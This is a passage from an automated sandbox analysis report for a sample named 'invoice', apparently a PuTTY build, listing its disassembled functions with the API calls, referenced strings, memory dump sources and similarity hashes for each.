Part of subcall function 000000013FDE6110: GetProcAddress.KERNEL32(?,?,00000004,000000013FDE5A96,?,?,?,000000013FDE65D7,?,?,?,000000013FDDF335), ref: 000000013FDE6268

Strings

MessageBoxA, xrefs: 000000013FDE5F82
MessageBoxW, xrefs: 000000013FDE5FA4

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: try_get_function$AddressProc
String ID: MessageBoxA$MessageBoxW
API String ID: 1640347226-1053882329
Opcode ID: db21aa969ef290db77c02c3c403ec89727a65673947baeabc10ee6521451b15e
Instruction ID: 52aebf1e9016b5cebc27c8025f8ca78fc479afdba0b34a5ffdba006eba29037c
Opcode Fuzzy Hash: db21aa969ef290db77c02c3c403ec89727a65673947baeabc10ee6521451b15e
Instruction Fuzzy Hash: FFF06D32A0164791EF59DFA1E9917D86360E720348FD5043ED60C061B6EF78CB8BC780

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDC6282 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20windowCOMMON

Download Yara Rule

APIs

GetStockObject.GDI32 ref: 000000013FDC62B2
SelectPalette.GDI32 ref: 000000013FDC62C1

Part of subcall function 000000013FDDFF98: _set_error_mode.LIBCMT ref: 000000013FDDFFBF

Strings

../windows/window.c, xrefs: 000000013FDC629B
wgs.term_hwnd, xrefs: 000000013FDC6294

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: ObjectPaletteSelectStock_set_error_mode
String ID: ../windows/window.c$wgs.term_hwnd
API String ID: 2940787024-1481530914
Opcode ID: faed5dc3648f1d1f03cf026873d8e73d0c7aba86124b78ff4b15c487562dab54
Instruction ID: fc9c453333bf7fbc5171798a8ae4e31e9c392422d442d4d6f4a6ddc902e32223
Opcode Fuzzy Hash: faed5dc3648f1d1f03cf026873d8e73d0c7aba86124b78ff4b15c487562dab54
Instruction Fuzzy Hash: 86F06D38F10924A9FB14AB56EC547D52312E744B90F41803EC809067F1AE788387C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDF372C Relevance: 6.2, APIs: 4, Instructions: 159COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000013FDF376D
_invalid_parameter_noinfo.LIBCMT ref: 000000013FDF37ED
_invalid_parameter_noinfo.LIBCMT ref: 000000013FDF3841
_get_daylight.LIBCMT ref: 000000013FDF3899

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: _invalid_parameter_noinfo$_get_daylight
String ID:
API String ID: 72036449-0
Opcode ID: c4f16ce307cdeb207458d9eeaf2c9316e6e98900dda7c197be83ef92d62807be
Instruction ID: 1f492c0b20e48abc2880dd1f5b272934a5b798830095739271ce3d85764b1a34
Opcode Fuzzy Hash: c4f16ce307cdeb207458d9eeaf2c9316e6e98900dda7c197be83ef92d62807be
Instruction Fuzzy Hash: 5651C232E2474082F7695BA8D41DBFD7A80E740724F1B843DDA168BAD6C23ECB4B8751

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDEC388 Relevance: 6.1, APIs: 4, Instructions: 145fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 000000013FDEC3E5
WriteFile.KERNEL32 ref: 000000013FDEC4EB
WriteFile.KERNEL32 ref: 000000013FDEC52C
GetLastError.KERNEL32 ref: 000000013FDEC56B

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLast
String ID:
API String ID: 765721374-0
Opcode ID: 5ae7b93ce96973e26ad2d2ef35f52fae951998901e61ebe61d1568860b7304ae
Instruction ID: ae3d4245028832e08956ef6b277b36d1bee235cc11be5bf659687635ea46e81a
Opcode Fuzzy Hash: 5ae7b93ce96973e26ad2d2ef35f52fae951998901e61ebe61d1568860b7304ae
Instruction Fuzzy Hash: 1B518E32F14A5099EB11CFA5E4883DD3BB0F355B98F444129DE4E57BA9DB34C296C710

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDC87A8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 000000013FDC8838
CloseHandle.KERNEL32 ref: 000000013FDC883E

Strings

h && !h->u.g.moribund, xrefs: 000000013FDC87BB
../windows/winhandl.c, xrefs: 000000013FDC87C2

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: CloseHandle
String ID: ../windows/winhandl.c$h && !h->u.g.moribund
API String ID: 2962429428-3445032432
Opcode ID: a9d5e88dd267c6e88f58f01d57ab4cdab0d1821a50f78911b0018e809b56a779
Instruction ID: 0be7043cd3633e0bdd59f637bb008a31f6d99a633bdd1e6120bf13da14f12d3a
Opcode Fuzzy Hash: a9d5e88dd267c6e88f58f01d57ab4cdab0d1821a50f78911b0018e809b56a779
Instruction Fuzzy Hash: B711E231E0015086FF35EBA6F5487EA7360AB55750F040139CB8E06AE1EA68DAC7C304

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDD480C Relevance: 6.0, APIs: 4, Instructions: 40timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,?,000000013FDD4549), ref: 000000013FDD4839
GetCurrentThreadId.KERNEL32(?,?,?,000000013FDD4549), ref: 000000013FDD4847
GetCurrentProcessId.KERNEL32(?,?,?,000000013FDD4549), ref: 000000013FDD4853
QueryPerformanceCounter.KERNEL32(?,?,?,000000013FDD4549), ref: 000000013FDD4863

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: eb0f3c2039feeedfa0bd323bb3e7716855bf043e9f2da5d48f6d290c02aa87ed
Instruction ID: 2aeb07fd349c72576f8872bbc456c88e64720f6e1d1d8098aa6e0e5b938062cc
Opcode Fuzzy Hash: eb0f3c2039feeedfa0bd323bb3e7716855bf043e9f2da5d48f6d290c02aa87ed
Instruction Fuzzy Hash: A2112A36B00F409EEB10DF60E85539933A4F74DB58F451A3AEA5D837A4EB38C2A58340

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDD8394 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000013FDD83BF
_invalid_parameter_noinfo.LIBCMT ref: 000000013FDD85E4

Strings

*, xrefs: 000000013FDD84D3

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: *
API String ID: 3215553584-163128923
Opcode ID: d07d6cee199591fd68860684e10e688a1bd391acd01dd50dc9d27cf51d267f5e
Instruction ID: 6430c145b4909d9939190640dee13bcd5ce3c740fc84af86643737096d894fe0
Opcode Fuzzy Hash: d07d6cee199591fd68860684e10e688a1bd391acd01dd50dc9d27cf51d267f5e
Instruction Fuzzy Hash: 1771B4B2904614C6E7679FA982483AC3BB0FB49F18F24113EEB46862F4DB34C683C751

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDEC7C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000000013FDEC8D7
GetLastError.KERNEL32 ref: 000000013FDEC8F9

Strings

U, xrefs: 000000013FDEC883

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: ab33362c29eeb1ac97a74bfc165ae364372c650aa9c2860b57120588940627f1
Instruction ID: 7f2370c9f6793594bdfdf19175b9324a06d6f62ac91367b928790042b5eb68d2
Opcode Fuzzy Hash: ab33362c29eeb1ac97a74bfc165ae364372c650aa9c2860b57120588940627f1
Instruction Fuzzy Hash: 2141D532B14A8486EB20DF65E8483EA77A1F798794F814139EE4D87798EF7CC602C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDE58B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000000013FDE58ED
CompareStringW.KERNEL32 ref: 000000013FDE5975

Strings

CompareStringEx, xrefs: 000000013FDE58E1

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: CompareStringtry_get_function
String ID: CompareStringEx
API String ID: 3328479835-2590796910
Opcode ID: 799793462affebfb64dbc51ee5b9aa2ff8527f1ebdc4a9e5aba6654374449e2b
Instruction ID: 30bab24519f168caf29135548063b695fc1645ceb587fe616b09556e1fba23d5
Opcode Fuzzy Hash: 799793462affebfb64dbc51ee5b9aa2ff8527f1ebdc4a9e5aba6654374449e2b
Instruction Fuzzy Hash: 19112436A08B8086D760CF46F48079AB7A1F789B90F54412AEE8D83B29DF38C6418B00

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDBA57D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32 ref: 000000013FDBA602

Strings

c && (c->ctrl->generic.type == CTRL_LISTBOX || (c->ctrl->generic.type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 000000013FDBA5B4
../windows/winctrls.c, xrefs: 000000013FDBA5BB

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: ItemMessageSend
String ID: ../windows/winctrls.c$c && (c->ctrl->generic.type == CTRL_LISTBOX || (c->ctrl->generic.type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
API String ID: 3015471070-3312220692
Opcode ID: 95958f963fb498dba2fb2cc180552eb682d4893e99afdb65c9a20d55a3c15f79
Instruction ID: 902c5d5e80490a3675de2a9eabc8b51bb25d17bbcf6d9a3b3307af47d74e65a0
Opcode Fuzzy Hash: 95958f963fb498dba2fb2cc180552eb682d4893e99afdb65c9a20d55a3c15f79
Instruction Fuzzy Hash: 8401B131B0854846FF65CF46E5987D82BA1E78AB80F818039CE0D47BA0DF29CF86CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDBA934 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32 ref: 000000013FDBA9A5

Strings

c && c->ctrl->generic.type == CTRL_LISTBOX && !c->ctrl->listbox.multisel, xrefs: 000000013FDBA962
../windows/winctrls.c, xrefs: 000000013FDBA969

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: ItemMessageSend
String ID: ../windows/winctrls.c$c && c->ctrl->generic.type == CTRL_LISTBOX && !c->ctrl->listbox.multisel
API String ID: 3015471070-1690129383
Opcode ID: 80f843cc09342320f924b5b24bb7defd828f3a7d5e288c865824ee6532045edb
Instruction ID: b38efd8af4a2deceb8af838678a6775e7cc4a2606c948ce289d551af7c1958e4
Opcode Fuzzy Hash: 80f843cc09342320f924b5b24bb7defd828f3a7d5e288c865824ee6532045edb
Instruction Fuzzy Hash: 41018132B1061485FF609F56E8487D967A0AB85B94F868039DE4C4B7A4DB78CE87CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDBA8B9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32 ref: 000000013FDBA920

Strings

../windows/winctrls.c, xrefs: 000000013FDBA8F4
c && c->ctrl->generic.type == CTRL_LISTBOX && c->ctrl->listbox.multisel && c->ctrl->listbox.height != 0, xrefs: 000000013FDBA8ED

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: ItemMessageSend
String ID: ../windows/winctrls.c$c && c->ctrl->generic.type == CTRL_LISTBOX && c->ctrl->listbox.multisel && c->ctrl->listbox.height != 0
API String ID: 3015471070-819486137
Opcode ID: 1d21cbcc8fde8bd8a1ea3a0f734b246514b606ed6a85d3eeb0ab85ca5ff360e4
Instruction ID: 78bd675da41c3aa26a5e46a51d4d777e43b408362fde4ac97a70e2d887021e85
Opcode Fuzzy Hash: 1d21cbcc8fde8bd8a1ea3a0f734b246514b606ed6a85d3eeb0ab85ca5ff360e4
Instruction Fuzzy Hash: 65018135B1051485FF659F92E8487D86751AB84F94F8A8039DE0D077A4DB78CE8BDB01

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDBA770 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32 ref: 000000013FDBA7DB

Strings

c && c->ctrl->generic.type == CTRL_LISTBOX, xrefs: 000000013FDBA798
../windows/winctrls.c, xrefs: 000000013FDBA79F

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: ItemMessageSend
String ID: ../windows/winctrls.c$c && c->ctrl->generic.type == CTRL_LISTBOX
API String ID: 3015471070-2182959475
Opcode ID: beabb67f72c259171680f8679693d6454b48f3564a63556e1a357af7b8f55192
Instruction ID: 377cfc8638451dbef9506149781cc8552aab92e436363fe2c138b52c61b52605
Opcode Fuzzy Hash: beabb67f72c259171680f8679693d6454b48f3564a63556e1a357af7b8f55192
Instruction Fuzzy Hash: E7F0223270091485FB519F5AE8447C86360AB89F84F858438DE0C0B3A4DB3CCA07CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDBA47E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

IsDlgButtonChecked.USER32 ref: 000000013FDBA4C1

Strings

../windows/winctrls.c, xrefs: 000000013FDBA4A9
c && c->ctrl->generic.type == CTRL_CHECKBOX, xrefs: 000000013FDBA4A2

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: ButtonChecked
String ID: ../windows/winctrls.c$c && c->ctrl->generic.type == CTRL_CHECKBOX
API String ID: 1719414920-1987567839
Opcode ID: 9dd617f3faaa767d1996330b0536fb376c4212a99447e07bbc4715c7d4de65bb
Instruction ID: 10e5d69efc3894cb54e96a220572a7ded204faa87b5fe0d90af53cd289f17902
Opcode Fuzzy Hash: 9dd617f3faaa767d1996330b0536fb376c4212a99447e07bbc4715c7d4de65bb
Instruction Fuzzy Hash: C3F0ED31B0165882FA04EF67E9483C82721AB88BD0F85C438DE0C473A4EF28CE97C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDE5C68 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000000013FDE5C99
InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0044DFB8,000000013FDEBE26,?,?,?,000000013FDEBD1E,?,?,00000002,000000013FDE27A7), ref: 000000013FDE5CB3

Strings

InitializeCriticalSectionEx, xrefs: 000000013FDE5C8D

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: c9034ca680a3dcb92638782a4e34637a9f8de55b9fa075e543f116790d5b1a84
Instruction ID: ac5cc549f427ba46c74d9e59a38afd01fcec42cdd3e4a7f45b537ef6899e41d1
Opcode Fuzzy Hash: c9034ca680a3dcb92638782a4e34637a9f8de55b9fa075e543f116790d5b1a84
Instruction Fuzzy Hash: 87F05836F15B9092EB159F82E4447D92361EB48B90F4A443AAA1913B65CE38CA97CB80

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDB5934 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,?,?,000000013FDB59FE), ref: 000000013FDB5972

Strings

CryptProtectMemory, xrefs: 000000013FDB5968
crypt32.dll, xrefs: 000000013FDB5950

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: AddressProc
String ID: CryptProtectMemory$crypt32.dll
API String ID: 190572456-306445042
Opcode ID: f33e963fb791b4bd68d1a5dffb9ab54e1c9da35f233ea36bde3c4e028cd69607
Instruction ID: 2bedea3ecccd9472715138872a5e1a3f7ab119ea73509cd25e866afa15621a12
Opcode Fuzzy Hash: f33e963fb791b4bd68d1a5dffb9ab54e1c9da35f233ea36bde3c4e028cd69607
Instruction Fuzzy Hash: C6F0A038E0678AECFE01FB65A9583D027A26715310F56017EC489423B5FB3C8B978710

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDE5DA8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000000013FDE5DD1
__crtDownlevelLocaleNameToLCID.LIBCPMT ref: 000000013FDE5DE8

Strings

LocaleNameToLCID, xrefs: 000000013FDE5DBE

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
